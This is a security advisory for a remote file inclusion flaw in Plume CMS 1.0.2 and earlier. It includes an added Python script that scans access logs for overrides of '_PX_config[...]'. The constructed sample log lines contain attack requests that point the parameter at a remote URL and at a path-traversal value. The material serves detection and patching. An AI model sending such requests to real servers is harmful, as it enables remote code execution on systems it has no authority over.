Plume CMS <= 1.0.2 Remote File Inclusion Vulnerability

Summary
The remote host is running a PHP application that is prone to local and remote file inclusion attacks.
Description
The system is running Plume CMS, a simple but powerful content management system. The installed version does not sanitize user input in the '_PX_config[manager_path]' parameter in the 'prepend.php' file. This allows an attacker to include arbitrary files and execute code on the system. This flaw is exploitable if PHP's register_globals is enabled.
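Detection example (added here, not part of the original advisory or of Plume CMS): a log check that flags any request supplying '_PX_config[...]' as a request parameter, which is the input register_globals would copy over the application's own configuration. The log lines, client addresses and the '/prepend.php' location are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format); hosts and paths are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Mar/2017:10:00:01 +0000] "GET /prepend.php?_PX_config[manager_path]=http://host.invalid/x HTTP/1.1" 200 512
192.0.2.11 - - [28/Mar/2017:10:00:02 +0000] "GET /prepend.php?_PX_config%5Bmanager_path%5D=../../../../etc/ HTTP/1.1" 200 512
192.0.2.12 - - [28/Mar/2017:10:00:03 +0000] "GET /index.php?page=news HTTP/1.1" 200 2048
192.0.2.13 - - [28/Mar/2017:10:00:04 +0000] "GET /prepend.php HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)  # URL scheme or stream wrapper


def classify(value):
    """Label the supplied path value: remote URL, local path/traversal, or other."""
    if REMOTE_RE.match(value):
        return "remote"
    if ".." in value or value.startswith("/"):
        return "local"
    return "other"


def find_override_attempts(log_text):
    """Return (client, param, kind) for every request that sets _PX_config[...]."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        query = urlsplit(target).query
        # parse_qsl percent-decodes names, so %5B/%5D variants are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.startswith("_PX_config["):
                hits.append((client, name, classify(value)))
    return hits


if __name__ == "__main__":
    for hit in find_override_attempts(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string; register_globals also imports POST and cookie values, so a clean result here does not rule out attempts made through those channels.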
Solution
Either sanitize the prepend.php file as advised by the developer (see first URL) or upgrade to Plume CMS version 1.0.3 or later.
References

Updated on 2017-03-28